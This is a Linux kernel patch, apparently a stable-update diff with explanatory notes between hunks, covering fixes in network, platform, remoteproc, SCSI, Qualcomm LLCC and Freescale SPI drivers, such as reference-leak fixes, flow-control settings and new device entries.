+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EARLY_SIZE,
+ 			       ocp_data / 8);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+@@ -5986,6 +5992,25 @@ static void rtl8153_disable(struct r8152 *tp)
+ 	r8153_aldps_en(tp, true);
+ }
+ 
++static u32 fc_pause_on_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
++}
++
++static u32 fc_pause_off_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
++}
++
++static void r8156_fc_parameter(struct r8152 *tp)
++{
++	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
++	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
++
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
++}
++
+ static int rtl8156_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -5994,6 +6019,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	if (test_bit(RTL8152_UNPLUG, &tp->flags))
+ 		return -ENODEV;
+ 
++	r8156_fc_parameter(tp);
+ 	set_tx_qlen(tp);
+ 	rtl_set_eee_plus(tp);
+ 	r8153_set_rx_early_timeout(tp);
+@@ -6025,9 +6051,24 @@ static int rtl8156_enable(struct r8152 *tp)
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_L1_CTRL, ocp_data);
+ 	}
+ 
++	ocp_data = ocp_read_word(tp, MCU_TYPE_USB, USB_FW_TASK);
++	ocp_data &= ~FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++	usleep_range(1000, 2000);
++	ocp_data |= FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++
+ 	return rtl_enable(tp);
+ }
+ 
++static void rtl8156_disable(struct r8152 *tp)
++{
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, 0);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, 0);
++
++	rtl8153_disable(tp);
++}
++
+ static int rtl8156b_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -6429,25 +6470,6 @@ static void rtl8153c_up(struct r8152 *tp)
+ 	r8153b_u1u2en(tp, true);
+ }
+ 
+-static inline u32 fc_pause_on_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
+-}
+-
+-static inline u32 fc_pause_off_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
+-}
+-
+-static void r8156_fc_parameter(struct r8152 *tp)
+-{
+-	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
+-	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
+-
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
+-}
+-
+ static void rtl8156_change_mtu(struct r8152 *tp)
+ {
+ 	u32 rx_max_size = mtu_to_size(tp->netdev->mtu);
+@@ -7538,6 +7560,11 @@ static void r8156_hw_phy_cfg(struct r8152 *tp)
+ 				      ((swap_a & 0x1f) << 8) |
+ 				      ((swap_a >> 8) & 0x1f));
+ 		}
++
++		/* Notify the MAC when the speed is changed to force mode. */
++		data = ocp_reg_read(tp, OCP_INTR_EN);
++		data |= INTR_SPEED_FORCE;
++		ocp_reg_write(tp, OCP_INTR_EN, data);
+ 		break;
+ 	default:
+ 		break;
+@@ -7933,6 +7960,11 @@ static void r8156b_hw_phy_cfg(struct r8152 *tp)
+ 		break;
+ 	}
+ 
++	/* Notify the MAC when the speed is changed to force mode. */
++	data = ocp_reg_read(tp, OCP_INTR_EN);
++	data |= INTR_SPEED_FORCE;
++	ocp_reg_write(tp, OCP_INTR_EN, data);
++
+ 	if (rtl_phy_patch_request(tp, true, true))
+ 		return;
+ 
+@@ -9377,7 +9409,7 @@ static int rtl_ops_init(struct r8152 *tp)
+ 	case RTL_VER_10:
+ 		ops->init		= r8156_init;
+ 		ops->enable		= rtl8156_enable;
+-		ops->disable		= rtl8153_disable;
++		ops->disable		= rtl8156_disable;
+ 		ops->up			= rtl8156_up;
+ 		ops->down		= rtl8156_down;
+ 		ops->unload		= rtl8153_unload;
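The relocated r8156_fc_parameter() sizes the RX-FIFO pause thresholds around the MTU-derived frame size, rounded up to 1 KiB plus fixed 6 KiB / 14 KiB margins, and the registers take the value in 16-byte units. A sketch of the arithmetic; the frame-size estimate standing in for mtu_to_size() is an assumption:

#include <stdio.h>

#define ALIGN_UP(x, a)	(((x) + (a) - 1) & ~((a) - 1))

int main(void)
{
	unsigned int mtu = 1500;
	unsigned int size = mtu + 22;	/* assumed header/CRC overhead */
	unsigned int pause_on = ALIGN_UP(size, 1024) + 6 * 1024;
	unsigned int pause_off = ALIGN_UP(size, 1024) + 14 * 1024;

	/* -> pause_on=8192 (reg 512), pause_off=16384 (reg 1024) */
	printf("pause_on=%u (reg %u), pause_off=%u (reg %u)\n",
	       pause_on, pause_on / 16, pause_off, pause_off / 16);
	return 0;
}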
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 0644069592211..259d54b229bf1 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3411,12 +3411,14 @@ static void free_unused_bufs(struct virtnet_info *vi)
+ 		struct virtqueue *vq = vi->sq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_sq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		struct virtqueue *vq = vi->rq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_rq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ }
+ 
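free_unused_bufs() can loop over many queues, each draining a long chain of buffers, so the patch drops a cond_resched() between queues to avoid monopolizing the CPU. A userspace analogue of the pattern, with sched_yield() standing in for cond_resched():

#include <sched.h>
#include <stdio.h>

static void drain_queue(int q)
{
	/* stand-in for the virtqueue_detach_unused_buf() loop */
	printf("drained queue %d\n", q);
}

int main(void)
{
	int max_queue_pairs = 4, i;

	for (i = 0; i < max_queue_pairs; i++) {
		drain_queue(i);
		sched_yield();	/* give other tasks a chance between queues */
	}
	return 0;
}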
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 29f75948ab00c..fe2de813fbf49 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2715,6 +2715,7 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 			break;
+ 		}
+ 
++
+ 		d3_data->notif_received |= IWL_D3_NOTIF_WOWLAN_INFO;
+ 		len = iwl_rx_packet_payload_len(pkt);
+ 		iwl_mvm_parse_wowlan_info_notif(mvm, notif, d3_data->status,
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 2ef201b625b38..3bacee2b8d521 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -211,6 +211,7 @@ struct bios_rfkill2_state {
+ static const struct key_entry hp_wmi_keymap[] = {
+ 	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
+ 	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
++	{ KE_KEY, 0x270,   { KEY_MICMUTE } },
+ 	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
+ 	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
+ 	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index cb24de9e97dc5..fa8f14c925ec3 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -44,14 +44,18 @@ static ssize_t store_min_max_freq_khz(struct uncore_data *data,
+ 				      int min_max)
+ {
+ 	unsigned int input;
++	int ret;
+ 
+ 	if (kstrtouint(buf, 10, &input))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&uncore_lock);
+-	uncore_write(data, input, min_max);
++	ret = uncore_write(data, input, min_max);
+ 	mutex_unlock(&uncore_lock);
+ 
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 7191ff2625b1e..e40cbe81b12c1 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10318,6 +10318,7 @@ static atomic_t dytc_ignore_event = ATOMIC_INIT(0);
+ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
++static int profile_force;
+ 
+ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		enum platform_profile_option *profile)
+@@ -10580,6 +10581,21 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 	if (err)
+ 		return err;
+ 
++	/* Check if user wants to override the profile selection */
++	if (profile_force) {
++		switch (profile_force) {
++		case -1:
++			dytc_capabilities = 0;
++			break;
++		case 1:
++			dytc_capabilities = BIT(DYTC_FC_MMC);
++			break;
++		case 2:
++			dytc_capabilities = BIT(DYTC_FC_PSC);
++			break;
++		}
++		pr_debug("Profile selection forced: 0x%x\n", dytc_capabilities);
++	}
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) { /* MMC MODE */
+ 		pr_debug("MMC is supported\n");
+ 		/*
+@@ -10593,11 +10609,6 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 				dytc_mmc_get_available = true;
+ 		}
+ 	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) { /* PSC MODE */
+-		/* Support for this only works on AMD platforms */
+-		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD) {
+-			dbg_printk(TPACPI_DBG_INIT, "PSC not support on Intel platforms\n");
+-			return -ENODEV;
+-		}
+ 		pr_debug("PSC is supported\n");
+ 	} else {
+ 		dbg_printk(TPACPI_DBG_INIT, "No DYTC support available\n");
+@@ -11646,6 +11657,9 @@ MODULE_PARM_DESC(uwb_state,
+ 		 "Initial state of the emulated UWB switch");
+ #endif
+ 
++module_param(profile_force, int, 0444);
++MODULE_PARM_DESC(profile_force, "Force profile mode. -1=off, 1=MMC, 2=PSC");
++
+ static void thinkpad_acpi_module_exit(void)
+ {
+ 	struct ibm_struct *ibm, *itmp;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 13802a3c3591d..68e66b60445c3 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -336,6 +336,22 @@ static const struct ts_dmi_data dexp_ursus_7w_data = {
+ 	.properties	= dexp_ursus_7w_props,
+ };
+ 
++static const struct property_entry dexp_ursus_kx210i_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
++	PROPERTY_ENTRY_U32("touchscreen-min-y",  2),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1720),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1137),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-dexp-ursus-kx210i.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data dexp_ursus_kx210i_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= dexp_ursus_kx210i_props,
++};
++
+ static const struct property_entry digma_citi_e200_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -378,6 +394,11 @@ static const struct ts_dmi_data gdix1001_01_upside_down_data = {
+ 	.properties	= gdix1001_upside_down_props,
+ };
+ 
++static const struct ts_dmi_data gdix1002_00_upside_down_data = {
++	.acpi_name	= "GDIX1002:00",
++	.properties	= gdix1001_upside_down_props,
++};
++
+ static const struct property_entry gp_electronic_t701_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 960),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 640),
+@@ -1185,6 +1206,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "7W"),
+ 		},
+ 	},
++	{
++		/* DEXP Ursus KX210i */
++		.driver_data = (void *)&dexp_ursus_kx210i_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "INSYDE Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "S107I"),
++		},
++	},
+ 	{
+ 		/* Digma Citi E200 */
+ 		.driver_data = (void *)&digma_citi_e200_data,
+@@ -1295,6 +1324,18 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "jumperx.T87.KFBNEEA"),
+ 		},
+ 	},
++	{
++		/* Juno Tablet */
++		.driver_data = (void *)&gdix1002_00_upside_down_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Default string"),
++			/* Both product- and board-name being "Default string" is somewhat rare */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_BOARD_NAME, "Default string"),
++			/* Above matches are too generic, add partial bios-version match */
++			DMI_MATCH(DMI_BIOS_VERSION, "JP2V1."),
++		},
++	},
+ 	{
+ 		/* Mediacom WinPad 7.0 W700 (same hw as Wintron surftab 7") */
+ 		.driver_data = (void *)&trekstor_surftab_wintron70_data,
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 95da1cbefacf0..506ec9565716b 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -627,15 +627,19 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da))
++		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da)) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		cpu_addr = devm_ioremap_wc(dev, rmem->base, rmem->size);
+ 		if (!cpu_addr) {
++			of_node_put(it.node);
+ 			dev_err(dev, "failed to map memory %p\n", &rmem->base);
+ 			return -ENOMEM;
+ 		}
+@@ -644,10 +648,12 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 		mem = rproc_mem_entry_init(dev, (void __force *)cpu_addr, (dma_addr_t)rmem->base,
+ 					   rmem->size, da, NULL, NULL, it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
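This and the following remoteproc fixes all plug the same leak: of_phandle_iterator_next() releases the previous node each time it advances, so any early exit from the loop has to drop the reference on the current node explicitly. A kernel-style fragment of the pattern (not a standalone program; np is assumed to be the device node already in scope):

	struct of_phandle_iterator it;
	struct reserved_mem *rmem;

	of_phandle_iterator_init(&it, np, "memory-region", NULL, 0);
	while (of_phandle_iterator_next(&it) == 0) {
		rmem = of_reserved_mem_lookup(it.node);
		if (!rmem) {
			of_node_put(it.node);	/* leaving early: drop the ref */
			return -EINVAL;
		}
		/* ... use rmem; on the next iteration the iterator
		 * itself releases it.node, so no put is needed here.
		 */
	}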
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 9fc978e0393ce..0ab840dc7e97f 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -541,6 +541,7 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(priv->dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -553,10 +554,12 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 					   imx_rproc_mem_alloc, imx_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/rcar_rproc.c b/drivers/remoteproc/rcar_rproc.c
+index aa86154109c77..1ff2a73ade907 100644
+--- a/drivers/remoteproc/rcar_rproc.c
++++ b/drivers/remoteproc/rcar_rproc.c
+@@ -62,13 +62,16 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(&rproc->dev,
+ 				"unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (rmem->base > U32_MAX)
++		if (rmem->base > U32_MAX) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		/* No need to translate pa to da, R-Car use same map */
+ 		da = rmem->base;
+@@ -79,8 +82,10 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 					   rcar_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/st_remoteproc.c b/drivers/remoteproc/st_remoteproc.c
+index a3268d95a50e6..e6bd3c7a950a2 100644
+--- a/drivers/remoteproc/st_remoteproc.c
++++ b/drivers/remoteproc/st_remoteproc.c
+@@ -129,6 +129,7 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -150,8 +151,10 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 7d782ed9e5896..23c1690b8d73f 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -223,11 +223,13 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (stm32_rproc_pa_to_da(rproc, rmem->base, &da) < 0) {
++			of_node_put(it.node);
+ 			dev_err(dev, "memory region not valid %pa\n",
+ 				&rmem->base);
+ 			return -EINVAL;
+@@ -254,8 +256,10 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
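Each of the remoteproc hunks above applies the same reference-counting rule: of_phandle_iterator_next() takes a reference on it.node for the current iteration and only drops it when the iterator advances or finishes, so every early return out of the loop must call of_node_put(it.node) itself. A minimal sketch of the corrected loop shape (a hypothetical driver; the carveout registration details are elided):

#include <linux/of.h>
#include <linux/of_reserved_mem.h>

static int demo_prepare_mem_regions(struct device_node *np)
{
	struct of_phandle_iterator it;
	struct reserved_mem *rmem;

	of_phandle_iterator_init(&it, np, "memory-region", NULL, 0);
	while (of_phandle_iterator_next(&it) == 0) {
		rmem = of_reserved_mem_lookup(it.node);
		if (!rmem) {
			/* The fix: drop the node reference before bailing out. */
			of_node_put(it.node);
			return -EINVAL;
		}
		/* ... build and register the carveout for rmem ... */
	}
	/* On normal termination the iterator has already put the node. */
	return 0;
}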
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index f2ee49756df8d..45d3595541820 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -2450,6 +2450,9 @@ static void __qedi_remove(struct pci_dev *pdev, int mode)
+ 		qedi_ops->ll2->stop(qedi->cdev);
+ 	}
+ 
++	cancel_delayed_work_sync(&qedi->recovery_work);
++	cancel_delayed_work_sync(&qedi->board_disable_work);
++
+ 	qedi_free_iscsi_pf_param(qedi);
+ 
+ 	rval = qedi_ops->common->update_drv_state(qedi->cdev, false);
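The qedi change follows the standard teardown ordering for deferred work: any delayed work whose handler dereferences driver state must be cancelled synchronously before that state is torn down, otherwise a late-firing handler races with the removal path. A condensed sketch of the pattern (hypothetical private struct):

#include <linux/workqueue.h>

struct demo_priv {
	struct delayed_work recovery_work;
	struct delayed_work disable_work;
};

static void demo_remove(struct demo_priv *priv)
{
	/* Wait for in-flight handlers and prevent re-arming. */
	cancel_delayed_work_sync(&priv->recovery_work);
	cancel_delayed_work_sync(&priv->disable_work);
	/* Only now is it safe to free what the handlers touch. */
}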
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 26efe12012a0d..d4d3eced52f35 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -122,10 +122,11 @@ struct llcc_slice_config {
+ 
+ struct qcom_llcc_config {
+ 	const struct llcc_slice_config *sct_data;
+-	int size;
+-	bool need_llcc_cfg;
+ 	const u32 *reg_offset;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
++	int size;
++	bool need_llcc_cfg;
++	bool no_edac;
+ };
+ 
+ enum llcc_reg_offset {
+@@ -454,6 +455,7 @@ static const struct qcom_llcc_config sdm845_cfg = {
+ 	.need_llcc_cfg	= false,
+ 	.reg_offset	= llcc_v1_reg_offset,
+ 	.edac_reg_offset = &llcc_v1_edac_reg_offset,
++	.no_edac	= true,
+ };
+ 
+ static const struct qcom_llcc_config sm6350_cfg = {
+@@ -1001,7 +1003,14 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 
+ 	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+-	if (drv_data->ecc_irq >= 0) {
++
++	/*
++	 * On some platforms, access to the EDAC registers is locked down
++	 * by the bootloader, so probing the EDAC driver would crash.
++	 * Hence, disable creation of the EDAC platform device on the
++	 * problematic platforms.
++	 */
++	if (!cfg->no_edac) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+ 						sizeof(*drv_data));
+diff --git a/drivers/spi/spi-fsl-cpm.c b/drivers/spi/spi-fsl-cpm.c
+index 17a44d4f50218..38452089e8f35 100644
+--- a/drivers/spi/spi-fsl-cpm.c
++++ b/drivers/spi/spi-fsl-cpm.c
+@@ -21,6 +21,7 @@
+ #include <linux/spi/spi.h>
+ #include <linux/types.h>
+ #include <linux/platform_device.h>
++#include <linux/byteorder/generic.h>
+ 
+ #include "spi-fsl-cpm.h"
+ #include "spi-fsl-lib.h"
+@@ -120,6 +121,21 @@ int fsl_spi_cpm_bufs(struct mpc8xxx_spi *mspi,
+ 		mspi->rx_dma = mspi->dma_dummy_rx;
+ 		mspi->map_rx_dma = 0;
+ 	}
++	if (t->bits_per_word == 16 && t->tx_buf) {
++		const u16 *src = t->tx_buf;
++		u16 *dst;
++		int i;
++
++		dst = kmalloc(t->len, GFP_KERNEL);
++		if (!dst)
++			return -ENOMEM;
++
++		for (i = 0; i < t->len >> 1; i++)
++			dst[i] = cpu_to_le16p(src + i);
++
++		mspi->tx = dst;
++		mspi->map_tx_dma = 1;
++	}
+ 
+ 	if (mspi->map_tx_dma) {
+ 		void *nonconst_tx = (void *)mspi->tx; /* shut up gcc */
+@@ -173,6 +189,13 @@ void fsl_spi_cpm_bufs_complete(struct mpc8xxx_spi *mspi)
+ 	if (mspi->map_rx_dma)
+ 		dma_unmap_single(dev, mspi->rx_dma, t->len, DMA_FROM_DEVICE);
+ 	mspi->xfer_in_progress = NULL;
++
++	if (t->bits_per_word == 16 && t->rx_buf) {
++		int i;
++
++		for (i = 0; i < t->len; i += 2)
++			le16_to_cpus(t->rx_buf + i);
++	}
+ }
+ EXPORT_SYMBOL_GPL(fsl_spi_cpm_bufs_complete);
+ 
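The spi-fsl-cpm change works because the CPM/QE engine shifts out words wider than 8 bits in little-endian byte order: 16-bit transfers are now staged through a bounce buffer whose halfwords are converted to LE before DMA and converted back in place on completion. The two conversion loops in isolation (a sketch; buffer allocation and DMA mapping stay with the driver):

#include <linux/byteorder/generic.h>

static void cpm_tx_to_wire(u16 *dst, const u16 *src, size_t len)
{
	size_t i;

	for (i = 0; i < len / 2; i++)
		dst[i] = cpu_to_le16p(src + i);	/* CPU order -> LE wire order */
}

static void cpm_rx_from_wire(void *rx_buf, size_t len)
{
	size_t i;

	for (i = 0; i < len; i += 2)
		le16_to_cpus(rx_buf + i);	/* LE wire order -> CPU order */
}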
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 5602f052b2b50..b14f430a699d0 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -177,26 +177,6 @@ static int mspi_apply_cpu_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	return bits_per_word;
+ }
+ 
+-static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+-				struct spi_device *spi,
+-				int bits_per_word)
+-{
+-	/* CPM/QE uses Little Endian for words > 8
+-	 * so transform 16 and 32 bits words into 8 bits
+-	 * Unfortnatly that doesn't work for LSB so
+-	 * reject these for now */
+-	/* Note: 32 bits word, LSB works iff
+-	 * tfcr/rfcr is set to CPMFCR_GBL */
+-	if (spi->mode & SPI_LSB_FIRST &&
+-	    bits_per_word > 8)
+-		return -EINVAL;
+-	if (bits_per_word <= 8)
+-		return bits_per_word;
+-	if (bits_per_word == 16 || bits_per_word == 32)
+-		return 8; /* pretend its 8 bits */
+-	return -EINVAL;
+-}
+-
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 					struct spi_transfer *t)
+ {
+@@ -224,9 +204,6 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else
+-		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+-							  bits_per_word);
+ 
+ 	if (bits_per_word < 0)
+ 		return bits_per_word;
+@@ -361,6 +338,22 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 32;
+ 			else if ((t->len & 1) == 0)
+ 				t->bits_per_word = 16;
++		} else {
++			/*
++			 * CPM/QE uses little endian for words > 8 bits,
++			 * so transform 16- and 32-bit words into 8-bit ones.
++			 * Unfortunately that doesn't work for LSB-first mode,
++			 * so reject those for now.
++			 * Note: 32-bit words with LSB-first work iff
++			 * tfcr/rfcr is set to CPMFCR_GBL.
++			 */
++			if (m->spi->mode & SPI_LSB_FIRST && t->bits_per_word > 8)
++				return -EINVAL;
++			if (t->bits_per_word == 16 || t->bits_per_word == 32)
++				t->bits_per_word = 8; /* pretend it's 8 bits */
++			if (t->bits_per_word == 8 && t->len >= 256 &&
++			    (mpc8xxx_spi->flags & SPI_CPM1))
++				t->bits_per_word = 16;
+ 		}
+ 	}
+ 	return fsl_spi_setup_transfer(m->spi, first);
+@@ -594,8 +587,14 @@ static struct spi_master *fsl_spi_probe(struct device *dev,
+ 	if (mpc8xxx_spi->type == TYPE_GRLIB)
+ 		fsl_spi_grlib_probe(dev);
+ 
+-	master->bits_per_word_mask =
+-		(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32)) &
++	if (mpc8xxx_spi->flags & SPI_CPM_MODE)
++		master->bits_per_word_mask =
